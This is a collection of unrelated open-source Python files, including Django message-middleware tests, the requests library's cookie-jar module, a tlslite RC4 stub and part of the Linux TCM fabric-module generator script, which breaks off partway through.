self.client = Client()
@djem_middleware_settings
def test_standard_request(self):
"""
Test that messages added via the message framework, on a standard
request, can be read back when using djem's MessageMiddleware.
"""
response = self.client.get(
'/messages/add/read/',
{'msg': 'test message'}
)
self.assertEqual(response.content, b'STANDARD: test message')
@djem_middleware_settings
def test_ajax_request(self):
"""
Test that messages added via the message framework, on an AJAX
request, can be read back when using djem's MessageMiddleware.
"""
response = self.client.get(
'/messages/add/read/',
{'msg': 'test message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: test message')
@djem_middleware_settings
def test_mixed_requests(self):
"""
Test that messages added on standard requests and AJAX requests use
different stores and do not interfere with each other when using djem's
MessageMiddleware.
"""
# Start with a standard request that adds a message, but doesn't read
# back the message store
response = self.client.get(
'/messages/add/',
{'msg': 'first standard message'}
)
self.assertEqual(response.content, b'STANDARD: no messages')
# Next, trigger an AJAX request that adds a message, but also doesn't
# read back the message store. This message should be lost once the
# request is completed.
response = self.client.get(
'/messages/add/',
{'msg': 'lost ajax message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: no messages')
# Then trigger an AJAX request that adds a message and does read back
# the message store - it should only see the message it added, not
# either of the two previous messages.
response = self.client.get(
'/messages/add/read/',
{'msg': 'ajax message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: ajax message')
# Finally, trigger another standard request that adds a message and
# reads back the message store - it should see the two messages added
# as part of standard requests, and not those added in the AJAX request
response = self.client.get(
'/messages/add/read/',
{'msg': 'second standard message'}
)
self.assertEqual(response.content, b'STANDARD: first standard message, second standard message')
@django_middleware_settings
def test_django_mixed_requests(self):
"""
Test that messages added on standard requests and AJAX requests DO
interfere with each other when using Django's MessageMiddleware.
"""
# Start with a standard request that adds a message, but doesn't read
# back the message store
response = self.client.get(
'/messages/add/',
{'msg': 'first standard message'}
)
self.assertEqual(response.content, b'STANDARD: no messages')
# Then trigger an AJAX request that adds a message and does read back
# the message store - it sees all messages
response = self.client.get(
'/messages/add/read/',
{'msg': 'ajax message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: first standard message, ajax message')
# Finally, trigger another standard request that adds a message and
# reads back the message store - it only sees its own message, since
# the others were consumed by the intervening AJAX request
response = self.client.get(
'/messages/add/read/',
{'msg': 'second standard message'}
)
self.assertEqual(response.content, b'STANDARD: second standard message')
|
hujiajie/pa-chromium
|
refs/heads/master
|
third_party/tlslite/tlslite/utils/RC4.py
|
359
|
"""Abstract class for RC4."""
from compat import * #For False
class RC4:
def __init__(self, keyBytes, implementation):
if len(keyBytes) < 16 or len(keyBytes) > 256:
raise ValueError()
self.isBlockCipher = False
self.name = "rc4"
self.implementation = implementation
def encrypt(self, plaintext):
raise NotImplementedError()
def decrypt(self, ciphertext):
raise NotImplementedError()
|
EliteTK/PyBot
|
refs/heads/master
|
Modules/requests/cookies.py
|
413
|
# -*- coding: utf-8 -*-
"""
Compatibility code to be able to use `cookielib.CookieJar` with requests.
requests.utils imports from here, so be careful with imports.
"""
import copy
import time
import collections
from .compat import cookielib, urlparse, urlunparse, Morsel
try:
import threading
# grr, pyflakes: this fixes "redefinition of unused 'threading'"
threading
except ImportError:
import dummy_threading as threading
class MockRequest(object):
"""Wraps a `requests.Request` to mimic a `urllib2.Request`.
The code in `cookielib.CookieJar` expects this interface in order to correctly
manage cookie policies, i.e., determine whether a cookie can be set, given the
domains of the request and the cookie.
The original request object is read-only. The client is responsible for collecting
the new headers via `get_new_headers()` and interpreting them appropriately. You
probably want `get_cookie_header`, defined below.
"""
def __init__(self, request):
self._r = request
self._new_headers = {}
self.type = urlparse(self._r.url).scheme
def get_type(self):
return self.type
def get_host(self):
return urlparse(self._r.url).netloc
def get_origin_req_host(self):
return self.get_host()
def get_full_url(self):
# Only return the response's URL if the user hadn't set the Host
# header
if not self._r.headers.get('Host'):
return self._r.url
# If they did set it, retrieve it and reconstruct the expected domain
host = self._r.headers['Host']
parsed = urlparse(self._r.url)
# Reconstruct the URL as we expect it
return urlunparse([
parsed.scheme, host, parsed.path, parsed.params, parsed.query,
parsed.fragment
])
def is_unverifiable(self):
return True
def has_header(self, name):
return name in self._r.headers or name in self._new_headers
def get_header(self, name, default=None):
return self._r.headers.get(name, self._new_headers.get(name, default))
def add_header(self, key, val):
"""cookielib has no legitimate use for this method; add it back if you find one."""
raise NotImplementedError("Cookie headers should be added with add_unredirected_header()")
def add_unredirected_header(self, name, value):
self._new_headers[name] = value
def get_new_headers(self):
return self._new_headers
@property
def unverifiable(self):
return self.is_unverifiable()
@property
def origin_req_host(self):
return self.get_origin_req_host()
@property
def host(self):
return self.get_host()
class MockResponse(object):
"""Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`.
...what? Basically, expose the parsed HTTP headers from the server response
the way `cookielib` expects to see them.
"""
def __init__(self, headers):
"""Make a MockResponse for `cookielib` to read.
:param headers: a httplib.HTTPMessage or analogous carrying the headers
"""
self._headers = headers
def info(self):
return self._headers
def getheaders(self, name):
self._headers.getheaders(name)
def extract_cookies_to_jar(jar, request, response):
"""Extract the cookies from the response into a CookieJar.
:param jar: cookielib.CookieJar (not necessarily a RequestsCookieJar)
:param request: our own requests.Request object
:param response: urllib3.HTTPResponse object
"""
if not (hasattr(response, '_original_response') and
response._original_response):
return
# the _original_response field is the wrapped httplib.HTTPResponse object,
req = MockRequest(request)
# pull out the HTTPMessage with the headers and put it in the mock:
res = MockResponse(response._original_response.msg)
jar.extract_cookies(res, req)
def get_cookie_header(jar, request):
"""Produce an appropriate Cookie header string to be sent with `request`, or None."""
r = MockRequest(request)
jar.add_cookie_header(r)
return r.get_new_headers().get('Cookie')
def remove_cookie_by_name(cookiejar, name, domain=None, path=None):
"""Unsets a cookie by name, by default over all domains and paths.
Wraps CookieJar.clear(), is O(n).
"""
clearables = []
for cookie in cookiejar:
if cookie.name == name:
if domain is None or domain == cookie.domain:
if path is None or path == cookie.path:
clearables.append((cookie.domain, cookie.path, cookie.name))
for domain, path, name in clearables:
cookiejar.clear(domain, path, name)
class CookieConflictError(RuntimeError):
"""There are two cookies that meet the criteria specified in the cookie jar.
Use .get and .set and include domain and path args in order to be more specific."""
class RequestsCookieJar(cookielib.CookieJar, collections.MutableMapping):
"""Compatibility class; is a cookielib.CookieJar, but exposes a dict
interface.
This is the CookieJar we create by default for requests and sessions that
don't specify one, since some clients may expect response.cookies and
session.cookies to support dict operations.
Requests does not use the dict interface internally; it's just for
compatibility with external client code. All requests code should work
out of the box with externally provided instances of ``CookieJar``, e.g.
``LWPCookieJar`` and ``FileCookieJar``.
Unlike a regular CookieJar, this class is pickleable.
.. warning:: dictionary operations that are normally O(1) may be O(n).
"""
def get(self, name, default=None, domain=None, path=None):
"""Dict-like get() that also supports optional domain and path args in
order to resolve naming collisions from using one cookie jar over
multiple domains.
.. warning:: operation is O(n), not O(1)."""
try:
return self._find_no_duplicates(name, domain, path)
except KeyError:
return default
def set(self, name, value, **kwargs):
"""Dict-like set() that also supports optional domain and path args in
order to resolve naming collisions from using one cookie jar over
multiple domains."""
# support client code that unsets cookies by assignment of a None value:
if value is None:
remove_cookie_by_name(self, name, domain=kwargs.get('domain'), path=kwargs.get('path'))
return
if isinstance(value, Morsel):
c = morsel_to_cookie(value)
else:
c = create_cookie(name, value, **kwargs)
self.set_cookie(c)
return c
def iterkeys(self):
"""Dict-like iterkeys() that returns an iterator of names of cookies
from the jar. See itervalues() and iteritems()."""
for cookie in iter(self):
yield cookie.name
def keys(self):
"""Dict-like keys() that returns a list of names of cookies from the
jar. See values() and items()."""
return list(self.iterkeys())
def itervalues(self):
"""Dict-like itervalues() that returns an iterator of values of cookies
from the jar. See iterkeys() and iteritems()."""
for cookie in iter(self):
yield cookie.value
def values(self):
"""Dict-like values() that returns a list of values of cookies from the
jar. See keys() and items()."""
return list(self.itervalues())
def iteritems(self):
"""Dict-like iteritems() that returns an iterator of name-value tuples
from the jar. See iterkeys() and itervalues()."""
for cookie in iter(self):
yield cookie.name, cookie.value
def items(self):
"""Dict-like items() that returns a list of name-value tuples from the
jar. See keys() and values(). Allows client-code to call
``dict(RequestsCookieJar)`` and get a vanilla python dict of key value
pairs."""
return list(self.iteritems())
def list_domains(self):
"""Utility method to list all the domains in the jar."""
domains = []
for cookie in iter(self):
if cookie.domain not in domains:
domains.append(cookie.domain)
return domains
def list_paths(self):
"""Utility method to list all the paths in the jar."""
paths = []
for cookie in iter(self):
if cookie.path not in paths:
paths.append(cookie.path)
return paths
def multiple_domains(self):
"""Returns True if there are multiple domains in the jar.
Returns False otherwise."""
domains = []
for cookie in iter(self):
if cookie.domain is not None and cookie.domain in domains:
return True
domains.append(cookie.domain)
return False # there is only one domain in jar
def get_dict(self, domain=None, path=None):
"""Takes as an argument an optional domain and path and returns a plain
old Python dict of name-value pairs of cookies that meet the
requirements."""
dictionary = {}
for cookie in iter(self):
if (domain is None or cookie.domain == domain) and (path is None
or cookie.path == path):
dictionary[cookie.name] = cookie.value
return dictionary
def __getitem__(self, name):
"""Dict-like __getitem__() for compatibility with client code. Throws
exception if there are more than one cookie with name. In that case,
use the more explicit get() method instead.
.. warning:: operation is O(n), not O(1)."""
return self._find_no_duplicates(name)
def __setitem__(self, name, value):
"""Dict-like __setitem__ for compatibility with client code. Throws
exception if there is already a cookie of that name in the jar. In that
case, use the more explicit set() method instead."""
self.set(name, value)
def __delitem__(self, name):
"""Deletes a cookie given a name. Wraps ``cookielib.CookieJar``'s
``remove_cookie_by_name()``."""
remove_cookie_by_name(self, name)
def set_cookie(self, cookie, *args, **kwargs):
if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
cookie.value = cookie.value.replace('\\"', '')
return super(RequestsCookieJar, self).set_cookie(cookie, *args, **kwargs)
def update(self, other):
"""Updates this jar with cookies from another CookieJar or dict-like"""
if isinstance(other, cookielib.CookieJar):
for cookie in other:
self.set_cookie(copy.copy(cookie))
else:
super(RequestsCookieJar, self).update(other)
def _find(self, name, domain=None, path=None):
"""Requests uses this method internally to get cookie values. Takes as
args name and optional domain and path. Returns a cookie.value. If
there are conflicting cookies, _find arbitrarily chooses one. See
_find_no_duplicates if you want an exception thrown if there are
conflicting cookies."""
for cookie in iter(self):
if cookie.name == name:
if domain is None or cookie.domain == domain:
if path is None or cookie.path == path:
return cookie.value
raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
def _find_no_duplicates(self, name, domain=None, path=None):
"""Both ``__get_item__`` and ``get`` call this function: it's never
used elsewhere in Requests. Takes as args name and optional domain and
path. Returns a cookie.value. Throws KeyError if cookie is not found
and CookieConflictError if there are multiple cookies that match name
and optionally domain and path."""
toReturn = None
for cookie in iter(self):
if cookie.name == name:
if domain is None or cookie.domain == domain:
if path is None or cookie.path == path:
if toReturn is not None: # if there are multiple cookies that meet passed in criteria
raise CookieConflictError('There are multiple cookies with name, %r' % (name))
toReturn = cookie.value # we will eventually return this as long as no cookie conflict
if toReturn:
return toReturn
raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
def __getstate__(self):
"""Unlike a normal CookieJar, this class is pickleable."""
state = self.__dict__.copy()
# remove the unpickleable RLock object
state.pop('_cookies_lock')
return state
def __setstate__(self, state):
"""Unlike a normal CookieJar, this class is pickleable."""
self.__dict__.update(state)
if '_cookies_lock' not in self.__dict__:
self._cookies_lock = threading.RLock()
def copy(self):
"""Return a copy of this RequestsCookieJar."""
new_cj = RequestsCookieJar()
new_cj.update(self)
return new_cj
def _copy_cookie_jar(jar):
if jar is None:
return None
if hasattr(jar, 'copy'):
# We're dealing with an instane of RequestsCookieJar
return jar.copy()
# We're dealing with a generic CookieJar instance
new_jar = copy.copy(jar)
new_jar.clear()
for cookie in jar:
new_jar.set_cookie(copy.copy(cookie))
return new_jar
def create_cookie(name, value, **kwargs):
"""Make a cookie from underspecified parameters.
By default, the pair of `name` and `value` will be set for the domain ''
and sent on every request (this is sometimes called a "supercookie").
"""
result = dict(
version=0,
name=name,
value=value,
port=None,
domain='',
path='/',
secure=False,
expires=None,
discard=True,
comment=None,
comment_url=None,
rest={'HttpOnly': None},
rfc2109=False,)
badargs = set(kwargs) - set(result)
if badargs:
err = 'create_cookie() got unexpected keyword arguments: %s'
raise TypeError(err % list(badargs))
result.update(kwargs)
result['port_specified'] = bool(result['port'])
result['domain_specified'] = bool(result['domain'])
result['domain_initial_dot'] = result['domain'].startswith('.')
result['path_specified'] = bool(result['path'])
return cookielib.Cookie(**result)
def morsel_to_cookie(morsel):
"""Convert a Morsel object into a Cookie containing the one k/v pair."""
expires = None
if morsel['max-age']:
expires = time.time() + morsel['max-age']
elif morsel['expires']:
time_template = '%a, %d-%b-%Y %H:%M:%S GMT'
expires = time.mktime(
time.strptime(morsel['expires'], time_template)) - time.timezone
return create_cookie(
comment=morsel['comment'],
comment_url=bool(morsel['comment']),
discard=False,
domain=morsel['domain'],
expires=expires,
name=morsel.key,
path=morsel['path'],
port=None,
rest={'HttpOnly': morsel['httponly']},
rfc2109=False,
secure=bool(morsel['secure']),
value=morsel.value,
version=morsel['version'] or 0,
)
def cookiejar_from_dict(cookie_dict, cookiejar=None, overwrite=True):
"""Returns a CookieJar from a key/value dictionary.
:param cookie_dict: Dict of key/values to insert into CookieJar.
:param cookiejar: (optional) A cookiejar to add the cookies to.
:param overwrite: (optional) If False, will not replace cookies
already in the jar with new ones.
"""
if cookiejar is None:
cookiejar = RequestsCookieJar()
if cookie_dict is not None:
names_from_jar = [cookie.name for cookie in cookiejar]
for name in cookie_dict:
if overwrite or (name not in names_from_jar):
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
return cookiejar
def merge_cookies(cookiejar, cookies):
"""Add cookies to cookiejar and returns a merged CookieJar.
:param cookiejar: CookieJar object to add the cookies to.
:param cookies: Dictionary or CookieJar object to be added.
"""
if not isinstance(cookiejar, cookielib.CookieJar):
raise ValueError('You can only merge into CookieJar')
if isinstance(cookies, dict):
cookiejar = cookiejar_from_dict(
cookies, cookiejar=cookiejar, overwrite=False)
elif isinstance(cookies, cookielib.CookieJar):
try:
cookiejar.update(cookies)
except AttributeError:
for cookie_in_jar in cookies:
cookiejar.set_cookie(cookie_in_jar)
return cookiejar
|
hellomotor/ahocorasick
|
refs/heads/master
|
test_memleak2.py
|
3
|
from distutils.util import get_platform
import sys
sys.path.insert(0, "build/lib.%s-%s" % (get_platform(), sys.version[0:3]))
import ahocorasick
"""We just want to exercise the code and monitor its memory usage."""
def getZerostate():
tree = ahocorasick.KeywordTree()
tree.add("foobar")
tree.make()
return tree.zerostate()
while True:
getZerostate()
|
allotria/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertMethodToPropertyIntentionTest/simple_after.py
|
167
|
class MyClass(object):
"""
My class to show intention.
"""
def __init__(self):
self._x = None
@property
def x(self):
return self._x
x = MyClass().x
|
Idematica/django-oscar
|
refs/heads/master
|
oscar/apps/partner/views.py
|
6027
|
# Create your views here.
|
scrollback/kuma
|
refs/heads/master
|
vendor/lib/python/south/introspection_plugins/__init__.py
|
129
|
# This module contains built-in introspector plugins for various common
# Django apps.
# These imports trigger the lower-down files
import south.introspection_plugins.geodjango
import south.introspection_plugins.django_audit_log
import south.introspection_plugins.django_tagging
import south.introspection_plugins.django_taggit
import south.introspection_plugins.django_objectpermissions
import south.introspection_plugins.annoying_autoonetoone
|
chenzhiwo/linux-sunxi
|
refs/heads/lemaker-3.4
|
Documentation/target/tcm_mod_builder.py
|
4981
|
#!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!se_nacl_new)\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!tpg) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!" + fabric_mod_port + ") {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
